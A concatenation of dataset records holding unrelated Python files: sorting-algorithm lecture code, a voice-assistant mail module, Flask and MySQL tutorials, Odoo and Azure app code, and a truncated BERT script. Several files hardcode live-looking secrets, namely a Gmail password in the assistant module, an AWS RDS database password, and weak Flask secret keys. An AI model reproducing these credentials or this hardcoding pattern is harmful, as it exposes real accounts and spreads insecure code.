vezesCampeao[i], times[i], debugMessage))\r\n \r\n","sub_path":"copa_do_mundo_2018.py","file_name":"copa_do_mundo_2018.py","file_ext":"py","file_size_in_byte":20614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"53549341","text":"# 1. 선택 정렬\r\n\r\n# 2. 버블정렬\r\n# 인접한 2개의 레코드를 비교하여 크기가 순서대로 되어있지 않으면\r\n# 서로 교환하는 비교-교환 과정을 리스트의 왼쪽 끝에서 시작하여 오른쪽\r\n# 끝까지 진행. => 스캔 과정이 이루어짐.\r\n\r\n# 3. 퀵 정렬\r\n#-분할 정복 알고리즘의 하나로, 평균적으로 매우 빠른 수행 속도를 자랑함.\r\n#-리스트를 비균등하게 분할\r\n#-분할 정복 방법\r\n#문제를 작은 2개의 문제로 분리하고 각각을 해결한 다음, 결과를 모아서 원래의 문제를 해결\r\n#순환 호출을 이용하여 구현.\r\n#-과정 설명\r\n#1.리스트 안에 있는 한 요소 선택. => 고른 원소를 피벗(pivot)이라고 함.\r\n#2.피벗을 기준으로 피벗보다 작은 요소들은 모두 피벗의 왼쪽으로 옮겨지고\r\n#피벗보다 큰 요소들은 모두 피벗의 오른쪽으로 옮겨짐.\r\n#3.피벗을 제외한 왼쪽 리스트와 오른쪽 리스트를 다시 정렬한다.\r\n#분할된 부분 리스트에 대하여 순환 호출을 이용하여 정렬을 반복.\r\n#부분 리스트에서도 다시 피벗을 정하고 피벗을 기준으로 2개의 부분 리스트로 나누는 과정 반복.\r\n#4. 부분 리스트들이 더 이상 분할이 불가능할 때까지 반복.\r\n\r\n#선택정렬\r\ndef selection_sort(data):\r\n for i in range(len(data)-1, 0, -1):\r\n for k in range(0, i):\r\n if(data[k] > data[k+1]):\r\n temp = data[k]\r\n data[k] = data[k+1]\r\n data[k+1] = temp\r\n print(\"selection 정렬 후 데이터 : \", end='')\r\n [print(num, end=' ') for num in data]\r\n#버블정렬\r\ndef bubble_sort(data):\r\n for i in range(len(data)-1, 0, -1):\r\n for k in range(0, i):\r\n if(data[k] > data[k+1]):\r\n temp = data[k]\r\n data[k] = data[k+1]\r\n data[k+1] = temp\r\n print(\"bubble 정렬 후 ��이터 : \", end='')\r\n [print(num, end=' ') for num in data]\r\n#퀵정렬\r\ndef quick_sort(data):\r\n total_sorted = []\r\n if len(data) <= 1:\r\n return data\r\n pivot = data[len(data) // 2]\r\n lesser_arr, equal_arr, greater_arr = [], [], []\r\n for num in data:\r\n if num < pivot:\r\n lesser_arr.append(num)\r\n elif num > pivot:\r\n greater_arr.append(num)\r\n else:\r\n equal_arr.append(num)\r\n return quick_sort(lesser_arr) + equal_arr + quick_sort(greater_arr)\r\n\r\n# 공통 -> 메인 부분\r\n# (1) p.219 16진수 정렬\r\nimport random\r\n\r\ndata = []\r\n\r\nprint(\"------------16진수 정렬----------------------------\")\r\nif __name__ == \"__main__\":\r\n for i in range(5):\r\n temp = hex(random.randrange(0,10000))\r\n data.append(temp)\r\n print(\"정렬 전 데이터 : \", end='')\r\n [print(num, end=' ') for num in data]\r\n print()\r\n #selection_sort\r\n selection_sort(data)\r\n print()\r\n #bubble_sort\r\n bubble_sort(data)\r\n print()\r\n #quick_sort\r\n data = quick_sort(data)\r\n print(\"quick 정렬 후 데이터 : \", end='')\r\n [print(num, end=' ') for num in data]\r\nprint()\r\n\r\n# (2) p.283 문자, 숫자 정렬\r\nimport random\r\n\r\ndata = []\r\nprint(\"------------문자, 숫자 정렬---------------------------\")\r\n## 메인 코드 부분 ##\r\nif __name__ == \"__main__\":\r\n for i in range(5):\r\n temp = hex(random.randrange(0, 10000))\r\n temp = temp[2:]\r\n data.append(temp)\r\n print(\"정렬 전 데이터 : \", end='')\r\n [print(num, end=' ') for num in data]\r\n print()\r\n # selection_sort\r\n selection_sort(data)\r\n print()\r\n # bubble_sort\r\n bubble_sort(data)\r\n print()\r\n # quick_sort\r\n data = quick_sort(data)\r\n print(\"quick 정렬 후 데이터 : \", end='')\r\n [print(num, end=' ') for num in data]\r\n","sub_path":"강의자료/2019-06-10/Code04-Mission1 - 선택, 버블, 퀵 정렬.py","file_name":"Code04-Mission1 - 선택, 버블, 퀵 정렬.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"639219062","text":"\n\nimport imaplib\nimport email\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport smtplib\nimport speech_recognition as sr\nimport serial\nimport time\nimport imaplib, email\nimport webbrowser\nimport pyttsx3\nimport threading\n\ndef delay_function(command):\n try:\n command, delay_time = command.lower().split()[-2:]\n except:\n return\n try:\n delay_time = int(delay_time)\n except:\n return 0\n if command == \"delay\":\n time.sleep(delay_time)\nclass main:\n\n def __init__(self):\n pass\n\n def search_algorithm(self, commands, functions, command_string, command_start, delay_function=delay_function):\n command_position = []\n for command in range(len(commands)):\n for command_str in range(len(commands[command])):\n position = 0\n next_cheack_position = 0\n current_search_command = f\"jarvis {commands[command][command_str]}\"\n while position != -1:\n position = command_string.find(current_search_command, next_cheack_position)\n next_cheack_position = position+1\n if position != -1:\n command_position.append(\n [\n command,\n command_str,\n [\n position,\n (position+len(current_search_command))\n ]\n ]\n )\n currected_list = []\n sorted_list = [None]*len(command_position)\n\n gide_list_endpoint= [sum(i[2]) for i in command_position]\n gide_list_startpoint= [sum(i[2]) for i in command_position]\n gide_list_endpoint.sort()\n\n for position in range(len(command_position)):\n index = gide_list_endpoint.index(gide_list_startpoint[position])\n sorted_list[index] = command_position[position]\n \n for items in range(len(sorted_list)):\n strip_position_1 = sorted_list[items][2][1]\n try:\n strip_position_2 = sorted_list[items+1][2][0]\n sorted_list[items].append(command_string[strip_position_1:strip_position_2])\n except:\n sorted_list[items].append(command_string[strip_position_1:])\n\n \n def function_runner(command, function):\n delay_function(command)\n function(command)\n\n for command_data in sorted_list:\n fucnction_to_run = functions[command_data[0]]\n string_after_command = command_data[3]\n thread = threading.Thread(target=function_runner, args=(string_after_command, fucnction_to_run))\n thread.start()\n\n\n\n\n def speach_get(self, time_len):\n data = \"\"\n r = sr.Recognizer()\n r.dynamic_energy_threshold = True\n print(sr.Microphone.list_microphone_names())\n print(\"Speak:\")\n \n try:\n with sr.Microphone(sample_rate = 20000, chunk_size = 2048) as d:\n audio = r.listen(d, phrase_time_limit=time_len)\n print(\"done\")\n except Exception as e:\n print(e)\n print(\"sorry\")\n \n try:\n data = r.recognize_google(audio)\n print(\"You said \" + data)\n except sr.UnknownValueError:\n print(\"Could not understand audio\")\n except sr.RequestError as e:\n print(\"Could not request results; {0}\".format(e))\n return data\n\n def read_mail(self):\n do = True\n \n try:\n m = imaplib.IMAP4_SSL(\"imap.gmail.com\", 993)\n m.login(\"jarvisbackchat@gmail.com\",\"Pickles123505992299505321123505992\")\n m.select(\"inbox\")\n except Exception as e:\n return None\n do=False\n if do:\n result, bent = m.uid('search', None, \"ALL\") # search all email and return uids\n prev = 0\n with open(\"backchatmail.txt\", \"r\") as opener:\n for i in opener:\n prev = int(i)\n if result == 'OK':\n for num in bent[0].split()[prev-1:]:\n if int(num) > prev:\n \n result, data = m.uid('fetch', num, '(RFC822)')\n if result == 'OK':\n email_message = email.message_from_bytes(data[0][1]) # raw email text including headers\n print('From:' + email_message['From'])\n try:\n print('subject:' + email_message['Subject'])\n except:\n pass\n try:\n try:\n do = email_message.get_payload()[ 0 ].get_payload()\n except:\n do = email_message.get_payload()\n print(email_message['From'].split(\"<\", 1)[1].split(\">\"))\n except:\n pass \n m.close() \n m.logout()\n with open(\"backchatmail.txt\", \"w\") as opener:\n zd = bent[0].split()\n opener.write(str(len(bent[0].split())+1)) \n return do\n\n def send_mail(self, toaddr, body):\n msg = MIMEMultipart()\n msg['From'] = fromaddr\n msg['To'] = toaddr\n msg['Subject'] = \"automated bounce back\"\n msg.attach(MIMEText(body, 'plain'))\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n b = True\n while b:\n try:\n server.login(\"jarvisbackchat@gmail.com\", \"Pickles123505992299505321123505992\")\n text = msg.as_string()\n server.sendmail(\"jarvisbackchat@gmail.com\", toaddr, text)\n b = False\n except:\n pass\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"imports/jarvis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381579968","text":"# -*- coding: utf-8 -*-\nfrom zope import schema\n\nfrom bika.lims import messagefactory as _\nfrom bika.lims.interfaces.samplepoint import ISamplePoint\nfrom bika.lims.interfaces.sampletype import ISampleType\nfrom plone.app.vocabularies.catalog import CatalogSource\nfrom plone.supermodel import model\nfrom z3c.relationfield import RelationChoice\n\nclass ISample(model.Schema):\n \"\"\"Represents the original sample.\n \"\"\"\n\n sample_type = RelationChoice(\n title=_(u\"Sample Type\"),\n source=CatalogSource(object_provides=ISampleType.__identifier__),\n required=True,\n )\n\n sample_point = RelationChoice(\n title=_(u\"Sample Point\"),\n source=CatalogSource(object_provides=ISamplePoint.__identifier__),\n required=False,\n )\n\n client_sample_id = schema.TextLine(\n title=_(u\"Client Sample ID\"),\n description=_(u\"The ID assigned to the sample by the client\"),\n required=False,\n )\n\n date_sampled = schema.Datetime(\n title=_(u\"Date Sampled\"),\n required=False,\n )\n","sub_path":"src/bika/lims/interfaces/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"649328297","text":"model_path = 'model_data/merged_model_v1.0.h5'\nanchors_path = 'model_data/drone_anchors.txt'\nclasses_path = 'model_data/one_class.txt'\nclassification_model_path = 'model_data/drone_bird_classification_model_v1.0.h5'\npre_score = 0.8\nmid_score = 0.8\nnext_score = 0.8\nbig_score = 0.5\niou = 0.1\nmodel_image_size = (1120, 1120)\ngpu_num = 1\n\nbird_label = 0\ndrone_label = 1\nflying_label = 2\nreference_fps = 25\narea_threshold = 0.0001593458 # corresponds to 100 for solution 572 x 768\ndrone_speed_threshold = 0.006510416 # corresponds to 5 for image width 768\nbird_speed_threshold = 0.015625 # corresponds to 12 for image width 768\n# appear_threshold = 0.7\nbbox_matching_threshold = 0.5\ncompute_camera_velocity = False\n","sub_path":"backend/app/api/checkin/utils_pro/enum_model.py","file_name":"enum_model.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"600184912","text":"'''\n#USE SAME INDEX AND BASE FILES OF PREVIOUS EXAMPLE\n#FLASHING MESSAGES\nThis program helps you to render HTML template in flask.We are creating a form in html and we are processing the entered values\nYou should create an HTML file inside a folder called \"templates\"\nin the same directory\n'''\nfrom flask import flash\nfrom flask import Flask #import the Flask object from the flask package\nfrom flask import render_template#for rendering html page\nfrom flask import redirect,url_for#for redirecting to another webpage\nfrom flask import request#for accessing data from form\nfrom flask import session#for accessing session\nfrom datetime import timedelta#accesing time\napp=Flask(__name__)#creating your Flask application instance with the name app\napp.secret_key=\"hello\"\napp.permanent_session_lifetime=timedelta(days=5)#here we are giving the session time as 5 days..we can also gives minutes instead of days\n@app.route(\"/\")#pass '/' to signify that this function respond to main URL\ndef home():\n return \"HELLO\"#connects with html page\n@app.route(\"/login\",methods=[\"POST\",\"GET\"])\ndef login():\n if request.method==\"POST\":#when the method is post(while entering data from keyboard) we are storing the input value in to variable user and calls user function\n session.permanent=True#making the session permanent(ususally session is default)\n user=request.form[\"nm\"]\n session[\"user\"]=user#storing value in session\n flash(\"LOGIN SUCCESSFUL\")\n return redirect(url_for(\"user\"))\n else:\n if \"user\" in session:#if user is loged in even if we write user and login we will get user page\n flash(\"ALready login\")\n return redirect(url_for(\"user\"))\n return render_template(\"index1.html\")#if method is post(while clicking submit button) we have to be in the same page\n@app.route(\"/user\")\ndef user():#user() function will get data from session\n if \"user\" in session:#we are checking whether the session is active or not\n user=session[\"user\"]\n return render_template('index2.html',user=user)\n else:\n flash(\"not login\")\n return redirect(url_for(\"login\"))#if session is not active we are going back to login page\n@app.route(\"/logout\")\ndef logout():#logout code\n\n flash(f\"you have been logged out\",\"info\")#message to be displayed( when we logout and got back to login page)\n session.pop(\"user\",None)\n \n return redirect(url_for(\"login\"))\nif __name__==\"__main__\":\n app.run()#run the development server.","sub_path":"LECTURE-6/program2.py","file_name":"program2.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"173377995","text":"import settings\nfrom database import user_repository, session_repository\nfrom services import auth_service, user_service, session_service\n\nclass Ioc:\n def __init__(self):\n self._user_repository = None\n self._session_repository = None\n self._auth_service = None\n self._user_service = None\n self._session_service = None\n\n def get_user_repository(self):\n if self._user_repository is None:\n self._user_repository = user_repository.InMemoryRepository()\n return self._user_repository\n\n def get_session_repository(self):\n if self._session_repository is None:\n self._session_repository = session_repository.InMemoryRepository()\n return self._session_repository\n\n def get_auth_service(self):\n if self._auth_service is None:\n self._auth_service = auth_service.AuthService()\n return self._auth_service\n\n def get_user_service(self):\n if self._user_service is None:\n self._user_service = user_service.UserService(self.get_user_repository(), self.get_auth_service())\n return self._user_service\n\n def _session_service(self):\n if self._session_service is None:\n self._session_service = session_service.SessionService(self.get_session_repository())\n return self._session_service\n\nioc = Ioc()\n","sub_path":"API/ioc.py","file_name":"ioc.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"531293315","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('/', views.home, name='home'),\n path('register', views.register, name='register'),\n path('login', views.loginUser, name='loginUser'),\n path('list', views.listModInstances, name='listModInstances'),\n path('view', views.viewAllRatings, name='viewAllRatings'),\n path('average/', views.averageRating, name='averageRating'),\n path('rate', views.rateProfessor, name='rateProfessor')\n]\n","sub_path":"cwk1Application/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"197095062","text":"import os\ntry:\n import configparser\nexcept ImportError:\n # Python 2\n import ConfigParser as configparser\n\n\nclass Configuration(object):\n DEFAULTS = {\n 'cipher': 'AES256',\n 'key-length': 64,\n 'password-generator': 'pwgen -nc 12 10',\n }\n\n def __init__(self, topdir):\n self.parser = configparser.RawConfigParser()\n\n self.parser.add_section('sala')\n for k, v in self.DEFAULTS.items():\n self.parser.set('sala', k, v)\n\n xdg_config_home = os.environ.get('XDG_CONFIG_HOME')\n if xdg_config_home is None:\n xdg_config_home = os.path.expanduser('~/.config')\n\n config_files = [\n os.path.expanduser('~/.sala.conf'),\n os.path.join(xdg_config_home, 'sala.conf'),\n os.path.join(topdir, '.sala/config'),\n ]\n\n self.parser.read(config_files)\n\n self.topdir = topdir\n self.saladir = os.path.join(topdir, '.sala')\n self.keyfile = os.path.join(self.saladir, 'key')\n self.hooksdir = os.path.join(self.saladir, 'hooks')\n\n def __getattr__(self, key):\n # Proxies ConfigParser getters like this:\n #\n # config.getint(x) -> config.parser.getint('sala', x)\n #\n\n if key not in ['get', 'getint', 'getfloat', 'getboolean']:\n raise AttributeError(key)\n\n return lambda x: getattr(self.parser, key)('sala', x)\n","sub_path":"sala/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"204785620","text":"import logging\r\n\r\nimport azure.functions as func\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\nimport json\r\nimport os\r\n\r\ndef main(req: func.HttpRequest) -> func.HttpResponse:\r\n logging.info('Python HTTP trigger function processed a request.')\r\n\r\n \r\n \r\n #data_path = \"../data/\"\r\n data_path = \"/storage_mount/\"\r\n \r\n articles_df = pd.read_csv(data_path+'articles_metadata.csv')\r\n articles_emb = pickle.load(open(data_path+\"articles_embeddings.pickle\",\"rb\"))\r\n clicks_by_hour_df = pd.DataFrame()\r\n for i in range(385):\r\n index = str(i).zfill(3)\r\n clicks_df = pd.read_csv(data_path+'clicks/clicks_hour_'+index+'.csv')\r\n clicks_by_hour_df = clicks_by_hour_df.append(clicks_df)\r\n \r\n user_id = int(req.params.get('user_id'))\r\n \r\n recos = get_recommendations(user_id,articles_df,clicks_by_hour_df,articles_emb)\r\n\r\n return func.HttpResponse(\r\n str(recos),\r\n status_code=200\r\n )\r\n\r\n \r\ndef get_recommendations(user_id,articles_df,clicks_by_hour_df,articles_emb,top_k = 5):\r\n \r\n article_interest_df = clicks_by_hour_df[clicks_by_hour_df.user_id == user_id]['click_article_id']\r\n articles_categories = articles_df[articles_df.article_id.isin(article_interest_df)].category_id\r\n category_freqs = articles_df[articles_df.article_id.isin(article_interest_df)].category_id.value_counts()\r\n \r\n cf = category_freqs.index.to_series()\r\n cat=cf.to_numpy()[0]\r\n\r\n selected_article = articles_categories[articles_categories==cat].index[0]\r\n exclude_list = articles_categories[articles_categories==cat].index.to_numpy()\r\n current_emb = articles_emb[selected_article]\r\n \r\n similarities = np.dot(current_emb,np.transpose(articles_emb))\r\n\r\n to_retrieve = (top_k + len(exclude_list))-1\r\n selected = similarities.argsort()[-to_retrieve:]\r\n\r\n filtered = set(selected) - set(exclude_list)\r\n\r\n \r\n return list(filtered)\r\n ","sub_path":"azFunction/MyContentFilteringHttpTrigger/.ipynb_checkpoints/__init__-checkpoint.py","file_name":"__init__-checkpoint.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"173264847","text":"from flask import Flask, request, redirect, render_template, session, flash\nfrom mysqlconnection import MySQLConnector\nimport re\napp = Flask(__name__)\napp.secret_key = \"itsasecret\"\n\nmysql = MySQLConnector(app,'friendsdb')\n\nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]*$')\n\n@app.route('/')\ndef index():\n query = \"SELECT * FROM friends\" # define your query\n friends = mysql.query_db(query) # run query with query_db()\n return render_template('index.html', all_friends = friends) # pass data to our template\n\n\n@app.route('/register', methods=['POST'])\ndef create():\n if (len(request.form['first_name']) < 1) or (len(request.form['last_name']) < 1) or (len(session['email']) < 1):\n session['color'] = 'red'\n flash(\"Form cannot be submitted with blank fields - please try again\")\n # incorrect email address format\n if not EMAIL_REGEX.match(request.form['email']):\n session['color'] = 'red'\n flash('Please enter a valid email address.')\n # does first name or last name contain numbers\n elif (request.form['first_name'].isalpha() == False) or (request.form['last_name'].isalpha() == False):\n session['color'] = 'red'\n flash(\"Name must contain only letters.\")\n else:\n session['color'] = 'green'\n query = \"INSERT INTO friends (first_name, last_name, email, created_at, updated_at) VALUES (:first_name, :last_name, :email, NOW(), NOW())\"\n # create dictionary of POST data received\n data = {\n 'first_name': request.form['first_name'],\n 'last_name': request.form['last_name'],\n 'email': request.form['email'],\n }\n mysql.query_db(query, data)\n flash(\"Friend Added!\")\n return redirect('/')\n\n@app.route('/friend//edit', methods=['GET'])\ndef edit(friend_id):\n query = \"SELECT * FROM friends WHERE idfriends = :specific_id\"\n data = {\n 'specific_id': friend_id\n }\n friends = mysql.query_db(query, data)\n return render_template('update.html', one_friend = friends[0])\n\n@app.route('/friend/', methods=['POST'])\ndef update(friend_id):\n query = \"UPDATE friends SET first_name = :first_name, last_name = :last_name, email = :email, updated_at = NOW() WHERE idfriends = :specific_id\"\n data = {\n 'first_name': request.form['first_name'],\n 'last_name': request.form['last_name'],\n 'email': request.form['email'],\n 'specific_id': request.form['form-id']\n # 'specific_id': friend_id\n }\n mysql.query_db(query, data)\n session['color'] = 'green'\n flash(\"Friend Information Updated\")\n return redirect('/')\n\n@app.route('/friend//delete', methods=['POST'])\ndef destroy(friend_id):\n query = \"DELETE FROM friends WHERE idfriends = :specific_id\"\n data = {'specific_id': friend_id}\n mysql.query_db(query, data)\n session['color'] = 'green'\n flash(\"Friend Removed\")\n return redirect('/')\n\napp.run(debug=True)\n","sub_path":"Flask_and_MySQL/Full_Friends/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"644093402","text":"#!/usr/bin/env python\nfrom flask import Flask, jsonify, request\napp = Flask(__name__)\n\nimport mysql.connector\nfrom mysql.connector import Error\nimport threading\nimport time\n\nconn = mysql.connector.connect(database = \"watsense\", user = \"watsense\", password = \"Anmol2882\", host = \"watsense.cswl7lqcb2fz.us-east-1.rds.amazonaws.com\", port = \"3306\")\nprint ('Opened database successfully')\ncur = conn.cursor()\n\n \n\n\n\n# @app.route('/', methods=['GET'])\n# def test():\n# return jsonify({'message': 'It works'})\n\n@app.route('/', methods=['GET'])\ndef ow():\n global cur\n cur.execute(\"SELECT * from watsense\")\n rows = cur.fetchall()\n data = []\n for row in rows:\n print(row)\n percentage = str(row[0])\n data += [{'percentage':percentage}]\n return jsonify(data)\ndt = []\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n \n# if __name__ == \"__main__\":\n# app.run(host=\"0.0.0.0\", port=\"80\")\n\n\n\n\n","sub_path":"Desktop/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"159766405","text":"import io\nimport re\nimport os\nimport base64\nimport pathlib\nfrom datetime import datetime\nfrom PIL import Image, ImageFont, ImageDraw\nfrom odoo import fields, api, models, tools\nfrom odoo.tools import image\nfrom odoo.addons.assets import ASSETS_PATH\n\n\nclass TVNews(models.Model):\n _name = \"tv.video\"\n\n name = fields.Char(string=\"Name\", required=True)\n title = fields.Char(string=\"Title\", required=True)\n url = fields.Char(string=\"URL\", required=True)\n description = fields.Text(string=\"Description\")\n tags = fields.Many2many(string=\"Tags\", comodel_name=\"tv.news.tags\")\n keys = fields.Many2many(string=\"Keys\", comodel_name=\"tv.news.keys\")\n state = fields.Selection(string=\"Sate\", default=\"draft\",\n selection=[('draft', 'Draft'),\n ('approve', 'Approve'),\n ('cancel', 'Cancel')])\n body = fields.Html(string=\"Body\", help=\"Body\")\n note = fields.Text(string=\"Note\")\n category_id = fields.Many2one(comodel_name=\"tv.news.category\", string=\"Category\")\n hot = fields.Boolean(string=\"Hot**\")\n creation_date = fields.Datetime(string=\"Creation Date\", default=datetime.now())\n schedule_date = fields.Datetime(string=\"Schedule Date\", default=datetime.now())\n category_name = fields.Char(string=\"Category Name\", related=\"category_id.name\", store=True)\n # active = fields.Boolean(string=\"Active\", default=True)\n image = fields.Many2one(string=\"Original\", comodel_name=\"ir.attachment\")\n image_thumb = fields.Many2one(string=\"Thumb\", comodel_name=\"ir.attachment\")\n image_medium = fields.Many2one(string=\"Medium\", comodel_name=\"ir.attachment\")\n image_top = fields.Many2one(string=\"Top\", comodel_name=\"ir.attachment\")\n image_left = fields.Many2one(string=\"Left\", comodel_name=\"ir.attachment\")\n img = fields.Char(string=\"Original\", related=\"image.url\", store=True)\n img_thumb = fields.Char(string=\"Thumb\", related=\"image_thumb.url\", store=True)\n img_medium = fields.Char(string=\"Medium\", related=\"image_medium.url\", store=True)\n img_top = fields.Char(string=\"Top\", related=\"image_top.url\", store=True)\n img_left = fields.Char(string=\"Left\", related=\"image_left.url\", store=True)\n # video\n video = fields.Many2one(string=\"Video\", comodel_name=\"ir.attachment\")\n video_url = fields.Char(string=\"Video\", related=\"video.url\", store=True)\n\n @api.onchange('image')\n def _get_image(self):\n for record in self:\n if record.image:\n if not record.image_thumb:\n record.image_thumb = record.image.copy()\n if not record.image_medium:\n record.image_medium = record.image.copy()\n if not record.image_top:\n record.image_top = record.image.copy()\n if not record.image_left:\n record.image_left = record.image.copy()\n\n # @api.model\n # def resize_image(self, data, name, default=\"(128,128)\"):\n # if data:\n # size = self.env['ir.config_parameter'].sudo().get_param(name, default=default)\n # size = eval(size)\n #\n # path_assets = ASSETS_PATH\n # img_path = path_assets.replace(\"/assets\", data.url)\n # img = Image.open(img_path)\n # data_img = open(path_assets.replace(\"/assets\", data.url), \"rb\").read()\n # if not size == img.size:\n # data_img = image.image_resize_image(base64.b64encode(data_img), size=size)\n # data_img = base64.b64decode(data_img)\n # # rewrite file name\n # dot_files = [\".png\", \".jpg\", \".jpeg\", \".gif\"]\n # data_write = {\"name\": data.name, \"url\": data.url, \"local_url\": data.url}\n # new_path = img_path\n # for d_f in dot_files:\n # if data.name.find(d_f) >= 0:\n # str_replace = \"_%s%s\" % (\"x\".join([str(x) for x in size]), d_f)\n # data_write[\"name\"] = data_write[\"name\"].replace(d_f, str_replace)\n # data_write[\"url\"] = data_write[\"url\"].replace(d_f, str_replace)\n # data_write[\"local_url\"] = data_write[\"local_url\"].replace(d_f, str_replace)\n # new_path = new_path.replace(d_f, str_replace)\n # break\n #\n # # write image\n # with open(new_path, \"wb\") as f:\n # f.write(data_img)\n # if not data.is_copy:\n # os.remove(img_path)\n # data.write(data_write)\n # return True\n\n @api.onchange('image_thumb')\n def _onchange_thumb(self):\n # self.resize_image(self.image_thumb, \"tv_news.size_image_thumb\")\n self.img_thumb = self.image_thumb.url\n\n @api.onchange('image_medium')\n def _onchange_medium(self):\n # self.resize_image(self.image_medium, \"tv_news.size_image_medium\", default=\"(250, 160)\")\n self.img_medium = self.image_medium.url\n\n @api.onchange('image_top')\n def _onchange_top(self):\n # self.resize_image(self.image_top, \"tv_news.size_image_top\", default=\"(480, 300)\")\n self.img_top = self.image_top.url\n\n @api.onchange('image_left')\n def _onchange_left(self):\n # self.resize_image(self.image_left, \"tv_news.size_image_left\", default=\"(240, 300)\")\n self.img_left = self.image_left.url\n\n @api.model\n def title_to_url(self, title):\n if title:\n title = title.lower()\n title = re.sub(\"à|á|ạ|ả|ã|â|ầ|ấ|ậ|ẩ|ẫ|ă|ằ|ắ|ặ|ẳ|ẵ\", \"a\", title)\n title = re.sub(\"è|é|ẹ|ẻ|ẽ|ê|ề|ế|ệ|ể|ễ\", \"e\", title)\n title = re.sub(\"ì|í|ị|ỉ|ĩ\", \"i\", title)\n title = re.sub(\"ò|ó|ọ|ỏ|õ|ô|ồ|ố|ộ|ổ|ỗ|ơ|ờ|ớ|ợ|ở|ỡ\", \"o\", title)\n title = re.sub(\"ù|ú|ụ|ủ|ũ|ư|ừ|ứ|ự|ử|ữ\", \"u\", title)\n title = re.sub(\"ỳ|ý|ỵ|ỷ|ỹ\", \"y\", title)\n title = re.sub(\"đ\", \"d\", title)\n title = re.sub(\"!|@|%|\\^|\\*|\\(|\\)|\\+|\\=|\\<|\\>|\\?|\\/|,\"\n \"|\\.|\\:|\\;|\\'|\\\"|\\&|\\#|\\[|\\]|~|\\$|_|`|-|{|}|\\||/\", \"\", title)\n title = re.sub(\"\\+\", \"\", title)\n title = title.strip()\n title = re.sub(\" \", \"-\", title)\n return title\n\n @api.onchange(\"title\")\n def onchange_title(self):\n self.name = self.title\n self.url = self.title_to_url(self.title)\n\n @api.multi\n def action_approve(self):\n res = self.write({\"state\": \"approve\"})\n return res\n\n @api.multi\n def action_cancel(self):\n res = self.write({\"state\": \"cancel\"})\n return res\n\n @api.model\n def create(self, values):\n res = super(TVNews, self).create(values)\n self.reset_hot()\n return res\n\n @api.multi\n def write(self, values):\n res = super(TVNews, self).write(values)\n self.reset_hot()\n return res\n\n @api.multi\n def reset_hot(self):\n if self.hot:\n for item in self:\n domain = [('hot', '=', True), ('category_id', '=', item.category_id.id)]\n self.search(domain).write({'hot': False})\n return True\n\n @api.multi\n def remove_image(self):\n for item in self:\n urls = [item.image.url, item.image_thumb.url, item.image_medium.url,\n item.image_top.url, item.image_top.url]\n for url in urls:\n if not url:\n continue\n url = ASSETS_PATH.replace(\"/assets\", url)\n if os.path.exists(url):\n os.remove(url)\n return True\n\n @api.multi\n def unlink(self):\n self.remove_image()\n res = super(TVNews, self).unlink()\n return res\n\n\nTVNews()\n","sub_path":"addons/tv_news/models/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":7869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"336170797","text":"import json\nimport os\nimport torch\nimport numpy as np\nimport transformers as tfs\nimport pandas as pd\nfrom tqdm import tqdm\ntqdm.pandas(desc='pandas bar')\nfrom torch import nn\nfrom bert_transform_classification import BertClassificationModel\nimport bertwwm_transform_classification\n\ntorch.set_default_tensor_type('torch.cuda.FloatTensor')\ntorch.cuda.set_device(0)\nsoftmax = nn.Softmax(dim=1)\n# Bert预训练模型\npretrain_model_path_bert = '../model_pre/bert_base_chinese/'\npretrain_model_path_bertwwm = '../model_pre/bert_chinese_wwm/'\npretrain_model_path_macbert = 'hfl/chinese-macbert-base'\nbert_model_path='../model/bert_model/bert_model_epoch2.pkl'\nbertwwm_model_path='../model/bertwwm/bertwwm_model_epoch2.pkl'\nmacbert_model_path='../model/macbert/macbert_model_epoch2.pkl'\nsubmission_path='../data/result/submission.csv'\nTEST_FILE_PATH='../data/data_preprocess/test_f_b.csv'\nINDEX = ['人物专栏', '作品分析', '情感解读', '推荐文', '攻略文', '治愈系文章', '深度事件', '物品评测', '科普知识文', '行业解读']\n\ndef predict_(x, index, bert_classifier_model,bertwwm_classifier_model,macbert_classifier_model):\n x1=x[0]+'。'+x[1]\n\n output_bert = bert_classifier_model([x]).cuda() \n output_bertwwm = bert_classifier_model([x1]).cuda()\n output_macbert = 